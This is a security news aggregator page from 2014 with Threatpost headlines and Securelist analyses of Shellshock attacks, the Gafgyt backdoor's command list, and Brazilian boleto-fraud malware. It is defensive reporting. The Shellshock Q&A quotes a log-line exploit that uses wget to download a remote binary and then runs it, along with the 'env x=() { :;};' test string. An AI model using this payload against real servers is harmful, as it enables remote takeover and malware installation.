Feed aggregator

Apple Patches Shellshock Vulnerability in Bash for OS X

Threatpost for B2B - Mon, 09/29/2014 - 18:34
Apple released its patch for the Bash vulnerability, repairing versions of OS X vulnerable to Shellshock exploits.

WPScan Vulnerability Database a New WordPress Security Resource

Threatpost for B2B - Mon, 09/29/2014 - 16:31
Researcher Ryan Dewhurst released the WPScan Vulnerability Database, a database housing security vulnerabilities in WordPress core code, plug-ins and themes. It's available for pen-testers, WordPress administrators and developers.

RadEditor Web Editor Vulnerable To XSS Attacks

Threatpost for B2B - Mon, 09/29/2014 - 12:15
All versions of an HTML editor used in several Microsoft properties, including ASP.NET, suffer from a high-risk cross-site scripting (XSS) vulnerability.

CloudFlare Rolls Out Free SSL

Threatpost for B2B - Mon, 09/29/2014 - 11:29
In a move that will essentially double the number of SSL-protected sites on the Web in the space of 24 hours, CloudFlare on Monday said that it was enabling SSL for all of its more than two million customers for free. The new service is called Universal SSL, and the company is making it available […]

FBI to Open Up Malware Investigator Portal to External Researchers

Threatpost for B2B - Mon, 09/29/2014 - 10:22
SEATTLE–The FBI has developed an internal malware-analysis tool, somewhat akin to the systems used by antimalware companies, and plans to open the system up to external security researchers, academics and others. The system is known as Malware Investigator and is designed to allow FBI agents and other authorized law enforcement users to upload suspicious files. […]

Apple: OS X Safe By Default Against Bash Vulnerability

Threatpost for B2B - Fri, 09/26/2014 - 14:14
Apple said it is working on a patch for OS X to counter the Bash vulnerability, but in the meantime is telling users the OS is safe by default.

Government Requests for Yahoo Data Down Slightly

Threatpost for B2B - Fri, 09/26/2014 - 10:34
Yahoo published its third Transparency Report, which reveals that it fielded fewer requests for user data than the previous reporting period, and that it also received between 0-999 National Security Letters.

Shellshock and its early adopters

Secure List feed for B2B - Fri, 09/26/2014 - 06:27

Shortly after disclosure of the Bash bug called "Shellshock" we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.

The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here's an example of how this attack appears in a webserver logfile:

The attacker listens on IP address 195.xx.xx.101 on TCP port 3333, while the attack's origin is the IP address 94.xx.xx.131. To gain control of a server with this method, no external binaries are involved.

In another ongoing attack the criminals are using a specially crafted HTTP-request to exploit the Bash vulnerability in order to install a Linux-backdoor on the victim's server. We're detecting the malware and its variants as Backdoor.Linux.Gafgyt.

The binary contains two hardcoded IP addresses. The first one is only used to notify the criminals about a new succesful infection. The second IP address is used as a command-and-control server (C&C) to communicate directly with the malware running on the infected webserver.

The following picture shows an example on how this communication can look like:

In line 1 the malware sends a "Hello" message and tells the attacker which architecture the binary was compiled for – here it's x86.

Independently of commands sent by the attackers, the backdoor sends a "PING" request every 30 seconds, which is answered with a "PONG" from the server (for better readability we've removed REMOVED is much better (S.O.) --> some of PING/PONG-pairs from the example above).

Commands always start with "!* ". The first command we see in this example is the "SCANNER ON" command in line 10. This tells the binary to scan random IP ranges for hosts accepting telnet connections on TCP port 23. When such a host is found, it tries to login using a hardcoded list of common default user/password combinations.

There is also a rudimentary honeypot fingerprinting routine implemented, which makes use of "busybox" as described by the Internet Storm Center here.

The next task the criminals start on the victim's box is initiated in line 14. Here the binary is told to perform flooding of IP 69.xx.xx.67 using UDP for 50 seconds. In line 17 the attackers stop the flooding in order to restart it in line 18, now targeting 178.x.x.241. The "None Killed." reply in line 21 appears because the flooding instruction from line 14 was already finished when the attacker tried to stop it using "!* KILLATTK" in line 17.

Here's the complete list of commands the backdoor accepts:

!* PING – Replies with "PONG!"
!* SH - Execute arbitrary shell command
!* GETLOCALIP – Replies with "My IP: $ipaddr"
!* SCANNER ON | OFF - Scan random networks, perform a very small dictionary attack (see above), test if target is a honeypot

!* HOLD - Hold flooding
!* JUNK – Perform junk flood
!* UDP – Perform udp flood
!* TCP – Perform tcp flood
!* KILLATTK - Kill all flood
!* LOLNOGTFO – Terminate backdoor.

Related binaries:

73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489
2d3e0be24ef668b85ed48e81ebb50dce50612fb8dce96879f80306701bc41614
ae3b4f296957ee0a208003569647f04e585775be1f3992921af996b320cf520b

 

0fde4c72038189e3d86676d84a1370787bcd284f98d1dff7736707fe05af7d9a
3b13eef9b24919dc7e7071068a83defcc4808a41dc86fadf039e08dce1107f7d
64b3751182be737c005fb04ffbe8b4dfe5930ed46066e87a9f6344de1d9985b8

 

Attacks against Boletos

Secure List feed for B2B - Fri, 09/26/2014 - 03:00
Introduction

José is a very suspicious person. He never uses internet banking services or buys anything using a credit card. Indeed, he doesn't even have one. He doesn't trust any of these modern technologies in the slightest. He's well aware of all the risks that exist online, so José prefers to keep his life offline.  However, not even that could save him from today's cybercriminals. He lost more than $2,000 in a single day: José was p0wned by a barcode and a piece of paper.

Brazilian crooks created a unique way of stealing money from these cautious, offline-only types: changing "boletos", popular banking documents issued by banks and all kind of businesses in Brazil. Boletos are actually one of the most popular ways to pay bills and buy goods in Brazil – even government institutions use them – and they are a unique feature of the Brazilian market.

In a series of online attacks targeting flaws on network devices – especially DSL modems – and involving malicious DNS servers, fake documents, browser code injections in the style of SpyEye, malicious browser extensions and a lot of creativity, the crooks have successfully stolen vast amounts of money, even from people who don't have credit cards or Internet banking accounts. It's a new worry for banks and financial institutions in the country.

This article explains how these attacks have happened in Brazil, and gives advice on protecting customers even when they have chosen to live offline.

Boleto bancário: the Brazilian payment system

Boletos are a very popular and easy way to pay bills or buy goods in Brazil today; even online stores will accept this kind of payment. All you need to do is print and pay it. According to the Brazilian Central Bank 21% of all payments in the country in 2011 were made using boletos.

Preferred payment methods in Brazil in 2011

According to e-bit 18% of all e-commerce transactions in Brazil in 2012 used boletos as the preferred payment method:

Preferred online payment method in Brazil in 2012

A boleto comes with an expiry date. Before that date it can be paid in at ATMs, branches and internet banking of any Bank, the Post Office, Lottery Agents and some supermarkets until its due date.  After the date it can only be paid at a branch of the issuing bank. The client also pays a fee levied by the bank; the fee increases with every passing day. Banks charge a handling fee for every boleto paid in by a customer. This fee varies from BRL 1,00 to BRL 12,00, depending on the bank. If the collection is registered then the bank will also charge a fee for every issued boleto, regardless of whether it was paid or not. Therefore, unregistered collections are more suitable for online transactions.

The bank also takes into account the size of the client, so a client with a higher volume of banking transactions, who has been working with the bank for a while, etc, is able to get lower fees or even fee exemption, which made the boleto a very important sales tool inside big companies, e-commerce and the government. If a company want to do business in Brazil, it essential to use boletos – Apple, Dell, Skype, Microsoft, DX.com, Alibaba.com, and even FIFA in the 2014 World Cup used it in local operations.

Buying Skype credits with boleto bancário as a payment method

This is the basic structure of a printed boleto bancário:

Boleto bancário for beginners according TheBrazilBusiness.com

  • Issuer Bank: the financial institution responsible for issuing and collection based on an agreement between itself and the merchant. The bank, once authorized to collect payment for the merchant, will credit the amount owed by the client in the merchant's bank account.
  • Identification Field: a numerical representation of the barcode, it contains all the information necessary to identify the merchant's bank account and clear the payment. This field is used in home and self-service banking.
  • Barcode: a code consisting of a group of printed and variously patterned bars (always 103mm in length and 13mm in height) and spaces and sometimes numerals that is designed to be scanned and read by a digital laser scanner and that contains information to identify the object it labels.

To pay a boleto at the bank or online all that is necessary is to scan the barcode – if it's unreadable (due to a bad print) users can type in the 44-number identification code instead. Some banks have a barcode scanner in their mobile apps, so mbanking users don't need to type the ID field; they can pay the boleto using their device's camera.

Paying a boleto using a barcode scanner

What could possibly go wrong? Well, how about changing the barcode or the ID field? It's simple and means payments can be redirected to another account. That's exactly what Brazilian fraudsters started to do – and the easiest and effective way was using malware.

The Brazilian boleto malware

A boleto can be generated and printed by the store that is selling its products to you, or even by users themselves during an online purchasing process. It's displayed in the browser, generally in HTML mode, using free libraries available for developers to implement in their ERP software or in their online store system.

BoletoPHP is a free resource for developers to generate boletos using PHP

The extensive documentation and legitimate open source software used to generate boletos helps malware creators to develop Trojans which are programmed to change boletos locally, as soon as they are generated by the computer or browser. These Trojans were spotted in the wild in April 2013 by LinhaDefensiva.com and are still being distributed in Brazil today. In fact most of the Brazilian criminals who use Trojan bankers to steal money are migrating their attacks to target boletos, using the same infrastructure.

The first generations chose to change the ID field number and the barcode:

A boleto modified by a Brazilian Trojan: the new ID number and barcode redirect the payment to the fraudster's account

Some versions of the malware use a JavaScript injection to change the content of the boleto:

"CodBarras" means barcode in Portuguese

Some later versions of this Trojan appeared and started to change only the numbers in the ID field:

"Linha Digitável" means typeable line in Portuguese; it's the ID field number

These new versions also used a span HTML element in order to add a white space to the barcode, making it unreadable. That forces the customer or bank staff to type the doctored 44-digit ID field to pay the boleto. So as not to raise suspicions, the Trojan does not change the value and due date for the transaction:

HTML page changed by the Trojan, adding a white space to invalidate the barcode, source LinhaDefensiva.org

The ID field includes a lot of information, detailing the bank account that will receive the payment and other data used according to the rules established by each bank. The "Nosso Número" data ("Our ID Number") is a unique identifier, different for each boleto. Changing the ID number is enough to redirect the payment to another bank account.

Understanding the ID field on boletos

Since most boletos are now generated in a browser, the Trojan targeting Internet Explorer users installs a BHO ready to communicate with a C&C and monitor traffic, looking for words such as "boleto" and "pagamento" (payment), choosing the right moment to inject the code and replacing the ID number stored in HTML with a new one, downloaded from the C&C.

It's like SpyEye: code injection in the browser's section

Initially most of these BHO had a very low detection rate, incorrectly flagged as Trojan banker by normal antimalware products (e.g the MD5s 23d418f0c23dc877df3f08f26f255bb5 and f089bf60aac48e24cd019edb4360d30d). One example of a request made by these BHOs and a response with a new ID number to be injected:

Request: http://141.105.65.5/11111.11111%2011111.111111%2011111.111111%201%201111111111
Response: 03399.62086 86000.000009 00008.601049 7 00000000000000

Compromised websites may also host scripts that generate the new ID number for these boletos:

Or something design to inject not only a new ID number but a new barcode as well:

We also found very professional control panels used by the fraudsters to collect data from infected machines and register every boleto as soon as it is generated. It's the same infrastructure used in the development of Trojan bankers, as a fraudulent boleto is a new way to steal money from the users.

A bad guy's control panel to control infected machines

Some of the panels offer a lot of details to the crooks, such as the date/hour the boleto was generated/changed, the old ID field and the replacement injected by the malware, the value and the origin – where the boleto was generated, if it was local or on a website.

Another boleto malware panel

Right now it's really easy to find places where wannabe cybercriminals can buy this toolkit and start their own attacks on boletos. A starter pack costs about R$ 500.00 (around US$ 250)

"Only for connoisseurs", the boleto kit malware + panel for sale on Facebook

The Zeus link – encrypted payloads

The boleto malware campaigns combined several new tricks to infect and steal from more users. One of the most recent is the use of non-executable and encrypted malware payloads XORed with a 32-bit key and compressed by ZLIB, using the extensions .BCK, .JMP, .MOD and others.

Encrypted .JMP file downloaded by the boleto malware

It's no coincidence that the same technique was used by the ZeuS GameOver gang. We have evidence of Brazilian criminals cooperating with western European gangs involved with ZeuS and its variants; it's not unusual to find them on underground forums looking for samples, buying new crimeware and ATM/PoS malware. The first results of this cooperation can be seen in the development of new attacks such the one targeting payments of boletos in Brazil.

Using encrypted payloads offers the criminals an effective way to bypass any firewalls, webfilters, network intrusion detection systems or other defenses that may be in place, as a tiny Trojan downloads these encrypted files and decrypts them to complete the infection.

Decrypted .JMP file: a normal PE executable

Intercepting SSL conections

Another interesting approach seen in boleto malware is the role of Fiddler, a web debugging proxy tool normally used by malware researchers. Some boleto malware uses it to intercept SSL traffic or to do a MitM, aiming to change boletos generated even in HTTPS pages.

We found this behavior in samples such as Trojan.Win32.Badur.imwt:

Boleto Trojan programmed to use Fiddler: MitM in SSL pages

The malware installs SSL certs from FiddlerCore on the infected machine and captures the traffic of HTTPS pages.

Certificate of Fiddler installed by the malware

Attacks against network devices

Investigating the attack vector used by the fraudsters and looking at how the victims got infected we found that all possible techniques are used. Social engineering attacks via well designed e-mail campaigns are the most widespread, but the most aggressive path includes the massive use of RCE on vulnerable DSL modems – in 2011/12 more than 4 million of these devices were attacked in Brazil and had their DNS settings changed by cybercriminals – the same approach is still being used to distribute this malware today.

When an affected user tries to visit popular websites or Brazilian web portals the malicious DNS configured in the DSL modem offers to install a new Flash Player. In reality, accepting this installation will infect the machine with boleto malware.

Is Google.com hosting a Flash Player installer? Nope, it's the malicious DNS in the DSL modem

Another recent move from Brazilian criminals was to spread web-based attacks against home-routers in an attempt to change the DNS of the device. These attacks were called "drive-by-pharming". It can be spread via malicious domains or by compromising popular websites:

News website "Estadão" compromised: the malicious script asks the password of your home router

The malicious script tries to guess the password of your home router. If it succeeds a new DNS server will be configured in the device and the criminals will control all your traffic. If it fails the compromised site will display a box asking for your credentials.

Is the password of your router gvt12345? Just guessing…

Recently we identified more than 30 malicious DNS servers being used in these attacks in Brazil. What does the new DNS server do? It redirects users' connections, serving phishing pages or even fake banking pages that modify every boleto the user generates.

If criminals combine web-based attacks with advertisements they can reach millions of people. This tactic is already being used:

What's the fastest way to attack home routers in Brazil? Using advertising

If the criminals can't compromise your network device, they'll target the ISP. We have already seen a series of DNS poisoning attacks against Net Virtua, one of the biggest Brazilian ISPs. Every time the aim is the same, targeting boletos.

But there was worse to come when cybercriminals decided to move to a more online approach…

Fake websites, fake extensions, fraudulent boletos

Some fraudsters decided that spreading their Trojans wasn't enough. They wanted faster returns and changed their tactics. They looked online, investing in sponsored links, fake websites that claimed to recalculate expired boletos (this is possible with this payment system) and malicious browser extensions for Google Chrome or Firefox.

Malicious Chrome extensions, in the official Store

One attack started with a message promising 100 minutes free Skype credit:

Skype-To-Go free for Chrome users! It's easy, just install an extension…

Why distribute a Trojan when you can trick users into installing a malicious browser extension that controls and monitors all the traffic? That's exactly what the fraudsters did, with the valuable help of the official Google Chrome Web Store, where the malicious extension was hosted:

Trojan-Banker.JS.Banker.bv

And this wasn't the only one, we found more:

Trojan-Banker.JS.BanExt.a, found on June 2014 in the Store, almost 2,000 users installed it

And one more, disguised as financial app that generates (fake) boletos:

Trojan-Banker.JS.Banker.bx, more than 3,800 installations…

The extension was prepared to just like a BHO on an infected machine: monitor and wait for the moment a boleto is generated, and then communicate with a C&C…

Trojan-Banker.JS.Banker.bw

…and receive a new ID field number, injecting it in the boleto while invalidating the barcode:

To disguise any intent to discover the real purpose of the extension there was some obfuscation of the main .JS file inside the .CRX file:

HEXed JavaScript file

After removing the obfuscation we can see the websites it's targeting:

The list includes big Brazilian backs and well-known online stores such as Americanas.com and PagSeguro (a service similar to Paypal). Customers of small banks did not escape from the attack – malicious extensions are set up to target a long list of local banks:

The huge number of malicious extensions prompted Google's decision at the end of May 2014 to limit the installation of Chrome extensions. Now they can only be hosted on the Chrome Web Store, but it is no problem for cybercriminals to put their malicious creations there.

Forcing the developer mode on Google Chrome

One example is Trojan-Banker.Win32.ClearWind.a. Its main target is to install a malicious extension that changes boletos, activating the developer mode on Google Chrome and forcing the installation of any extension, even those not hosted in the official store:

"Developer mode" activated on Chrome. The malware did it

These Trojans were able to infect a lot of people, installing the malicious extension to change boletos:

Trojan-Banker.Win32.ClearWind.a, more than 8,000 installations

Malicious Firefox add-on

But if you use Firefox, you're still at risk; there is a version of a malicious add-on for these users as well:

For bad guys' convenience, the malicious Firefox add-on is hosted on Google Storage:

Trojan-Banker.JS.Banker.cd ready to install a malicious addon to change your boletos

Sponsored links, fake websites

Other interesting characteristic of boletos is that you can generate a counterpart copy, in case you lose the original one. Some banks also offer a service to customers who missed the payment deadline and need to recalculate the value of an expired boleto and reissue it, after paying a small fee. All companies working with boletos offer these services to their customers, generally online, and cybercriminals can attack here as well.

The fraudsters decided to set up malicious websites that claim to offer re-issues or recalculations of expired boletos – but of course the new boleto is totally fake and redirects the payment to the criminals' account. These attacks are carried out with the help of search engines, buying up sponsored link campaigns and putting their fraudulent sites to the top of the results.

In a search for "calcular boleto vencido" (recalculate expired boleto) or "segunda via boleto" (counterpart copy) on Google, the first result is a fraudulent service:

Google isn't the only one – it's the same on Yahoo:

And Ask.com:

Not forgetting Bing:

The fake websites that supposedly offer these services have a very professional design to help trick their victims.

All you need to do is choose the bank that issued the boleto, type in the data and "reissue" it.

Of course the boleto generated has the exact same value and due date you asked for, but the ID field number has new data…

"Your new boleto was generated and registered. Pay it today"

It's not just malware: the boleto gangs are using all the possible ways of tricking users and stealing their money. A very widespread attack such this one resulted in many victims.

Online and offline victims

These attacks were especially notorious for their "crossover" to the offline world, stealing from people who do not use internet banking or buy things online. It can even steal from people who have never connected to the Internet in their lives. Several infected computers in thousands of stores all over the country started to generate fraudulent boletos for their customers. Once printed and paid they sent the money directly to the cybercriminals' accounts.

This sparked a real avalanche of Trojans using the same technique, and several businesses were badly affected. Many companies, the association of shopkeepers and the Brazilian government all issued alerts to their customers about the fraudulent boletos issued by these trojans (e.g. 1, 2, 3, 4). A lot of money was stolen and even now this fraud is costing banks, stores and customers dear.

Some cases draw our attention such this one of a businesswoman from Campo Grande – her company lost BRL 183,000 (around US$80,000):

That sum was stolen in just 3 days…

The Police Department in the state of Minas Gerais issued an alert to residents, warning that fraudsters had already stolen around BRL 25,000 (US$ 10,000) from businesses:

The police registered 12 cases in the state

To measure the problem we did the sinkhole of a C&C and found several victims – in only one malicious server the logs registered more than 612,000 requests in 3 days. Each one sought a fraudulent ID field to be injected into boletos generated on the infected machines:

Requests to a sinkholed C&C

Looking at these values led us to ask: how much money was stolen? How many victims? It's not easy to get this number if you do not thoroughly understand the Brazilian cybercrime environment.

8 billion?

In July 2014 several media outlets covered some RSA research about a "Cybercrime Scheme Uncovered in Brazil" – those attacks against boletos. Right from the start it offers a shocking figure: possibly as much as US$3.75 billion stolen, BRL 8.6 billion. In other words, it would have been the largest cybercrime heist known to date. To compare how big this number is, Banco do Brasil, the biggest bank in the country, makes US$ 6.6 billion in annual profits. So the bad guys stole half of the money from a big bank? Not so fast…

RSA found 495,793 boletos and 192,227 victims in their investigation. Once inside the control panel, they found the values of all payments that the virus had redirected. Added together, those payments topped the US$3.75 billion mark. This figure, however, includes everything – payments not made and payments that were made but not authorized by the bank (as the fraud was detected).  It also includes any test payments made by other researchers trying to understand the malware behavior or even tests made by the bad guy, or even duplicated entries as some customers tried to generate the same boleto several times.

A C&C displaying testing and duplicated entries

Counting every entry in a C&C resulted in this absurd number of R$ 8 billion, which averages at R$ 16,000 for each boleto. This value is unreal and incorrect — most boletos are worth far less. They also estimated a number of victims at 192,227. They did this by counting unique IP address, which is very unreliable. As in other parts of the world, most connections in Brazil use dynamic IP addresses. Other errors in the RSA report were highlighted by the LinhaDefensiva community in this article.

So how much was really stolen with fraudulent boletos? In reality only the banks can suggest a final total. The Brazilian Federation of Banks (FEBRABAN) publishes the combined losses faced by all banks due to electronic fraud each year. The year with the most losses so far was 2011. That year, they lost R$ 1.5 billion, or US$ 680 million.

One thing is certain: Brazilian cybercriminals are moving fast, adopting new techniques to continue attacking and stealing money from boletos. They would not waste their time if the scam was not profitable for them.

How to protect you and your company

This is a common question from users and businesses in Brazil working with boletos. Is it possible using this payment method securely?

FEBRABAN, the Brazilian Federation of Banks, suggests using DDA (Debito Direto Autorizado, Authorized Direct Debit). This replaces a printed boleto with an electronic bill, automatically withdrawing funds from another person's bank account after both parties pre-authorize the deal.

However some Brazilian companies are concerned by the higher costs associated with DDA. In this case we advise issuing boletos in a PDF format generated on the server-side, instead of using HTML format. At present no Trojan can modify a PDF boleto.

Boleto generated in PDF format: more secure than HTML

Kaspersky Lab customers are protected against these attacks – the Safe Money technology presented in our products can block it entirely by offering the option of opening pages in a safe mode where no malicious code could inject data. This ensures that boletos can be generated securely:

Kaspersky Fraud Prevention platform also stops Trojans designed to capture HTTPS traffic using Fiddler. KFP compares this fake certificate of Fiddler with the real certificate used by the Bank or payment service and then blocks access.

Kaspersky Fraud Prevention in action, blocking an unreliable SSL connection

Conclusions

Today these attacks are a big headache for everyone involved in buying and selling in Brazil – banks, businesses and customers alike. When a customer is hit with a fake boleto he says it's not his fault because he paid. The stores blame the bank for failing to process the payment properly. The bank insists it is only responsible for processing the boleto, not for the content of the paperwork. The buck goes round and round …

To complete the scenario Brazilian criminals specialize in identity theft. They often open banking accounts in the name of innocent people who know nothing of the situation, using stolen personal data. With money mules and accounts opened in the name of dead people; it's easy to see why it's so difficult to track stolen money.

Boletos are a very local and distinctive payment method; most other countries don't have anything similar and don't even know what a boleto is. Unfortunately security companies pay little attention to Brazil and miss a lot of issues that only local intelligence can detect and offer expertise. Local criminals are strictly limiting their attacks to Brazilian IPs and only install their Trojans on machines operating in Brazilian Portuguese.

Brazilian cybercriminals are following the same path as their counterparts in Russia and China, with a very specialized cybercrime scene where attacks on locals require special effort to understand properly. They are also sharing knowledge with cybercriminals from Eastern Europe, exporting new techniques such this one described here, clearly inspired by SpyEye, to do code injection.

Honeypot Snares Two Bots Exploiting Bash Vulnerability

Threatpost for B2B - Thu, 09/25/2014 - 16:30
Two malware samples trying to exploit the Bash vulnerability, both DDoS bots, were snared in a honeypot belonging to AlienVault Labs.

Patching Bash Vulnerability a Challenge for ICS, SCADA

Threatpost for B2B - Thu, 09/25/2014 - 14:34
Experts are concerned that many Linux-based industrial control systems and embedded systems could be too steep a patching challenge and remain in the crosshairs of the Bash vulnerability.

Mozilla Patches RSA Signature Forgery in Firefox, Thunderbird, NSS

Threatpost for B2B - Thu, 09/25/2014 - 12:41
Users of Mozilla products should update Firefox, NSS, SeaMonkey and Thunderbird in order to obtain fixes for a bug that could let an attacker forge RSA certificates and perform man-in-the-middle attacks.

Bash Exploit Reported, First Round of Patches Incomplete

Threatpost for B2B - Thu, 09/25/2014 - 11:41
Reports of the first in-the-wild exploits targeting the Bash vulnerability have surfaced, as have complaints the first patches for the bug are incomplete.

"Bash" (CVE-2014-6271) vulnerability – Q&A

Secure List feed for B2B - Thu, 09/25/2014 - 10:45
What is the "bash" vulnerability?

The "bash" vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.

In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.

At the time of writing, the vulnerability has already been used for malicious intentions – infecting vulnerable web servers with malware, and also in hacker attacks. Our researchers are constantly gathering new samples and indications of infections based on this vulnerability; and more information about this malware will be published soon.

The key thing to understand is that the vulnerability is not bound to a specific service, for example Apache or nginx. Rather, the vulnerability lies in the bash shell interpreter and allows an attacker to append system level commands to the bash environment variables.

How does it work?

I will use the same examples that we have seen in the advisories and proof-of-concept code that have been published,to explain how it works. When you have a CGI script on a web server, this script automatically reads certain environment variables, for example your IP address, your browser version, and information about the local system.

But just imagine that you could not only pass this normal system information to the CGI script, but could also tell the script to execute system level commands. This would mean that – without having any credentials to the webserver – as soon as you access the CGI script it would read your environment variables; and if these environment variables contain the exploit string, the script would also execute the command that you have specified.

What makes it unique?

This vulnerability is unique, because it's extremely easy to exploit and the impact is incredibly severe – not least because of the amount of vulnerable targets. This does not just affect web servers, it affects any software which uses the bash interpreter and reads data which you can control.

Researchers are also trying to figure out if other interpreters, such as PHP, JSP, Python or Perl, are also affected.  Ddepending on how code is written, sometimes an interpreter actually uses bash to execute certain functions; and if this is the case, it might be that other interpreters could also be used to exploit the CVE-2014-6271 vulnerability.

The impact is incredibly high because there are a lot of embedded devices that use CGI scripts – for example routers, home appliances and wireless access points.  They are also vulnerable and, in many cases, difficult to patch.

How widespread is it?

This is very difficult to say, but we know from our intelligence systems that people started to develop exploits and worms directly after the vulnerability information was published – both whitehat and blackhat researchers are scanning the Internet for vulnerable servers.

It is too early to know how widespread this is, but I know from my own research that there are a great many web servers running CGI scripts, and I am pretty sure that we will also see a lot of other types of exploits being developed that target local files and network daemons. There have been discussions regarding both OpenSSH and dhcp-clients being vulnerable to this attack as well.

How do I check if my system/web site has been affected?

The easiest way to check if your system is vulnerable is to open a bash-shell on your system and execute the following command:

"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


If the shell returns the string "vulnerable", you should update your system.

Also there are tools for the technical audience out there that can be used to verify if your server is affected by this vulnerability.

Advice on how to fix this problem

The first thing that you need to do is to update your bash version.  Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be completely effective, patching is the first thing to do. Services like Heroku pushed out fixes that will auto-apply within 24 hours, but developers can force the updates too.

If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.

Also review your webserver configuration.  If there are any CGI scripts that you are not using, consider disabling them

Is there threat to online banking?

This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop. Proof of concept targeting *nix workstation dhcp clients has been released, but most workstation dhcp process policies prevent actions from this sort of exploit by default.

Exploit attempts that we observed are targeting server vulnerabilities and downloading DDoS bots for further DDoS attacks. It is likely that servers hosting PII and handling sensitive merchant data are being attacked as well, but we have not yet observed it. There are merchants that unfortunately do not patch quickly.

Can I detect if someone has exploited this against me?

We would recommend reviewing your HTTP logs and check if there is anything suspicious. An example of a malicious pattern:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"


There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won't prevent someone from exploiting this vulnerability, but it will log the attackers actions on the system.

How serious is the threat?

This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc. So a patch that helps prevent remote code execution can't do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.

Is it the new Heartbleed?

Well, it's much easier for a cybercriminal to exploit than Heartbleed. Also, in the case of Heartbleed, a cybercriminal could only steal data from memory, hoping to find something interesting.  By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.

Can it be used in future APT attacks?

It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.

Syndicate content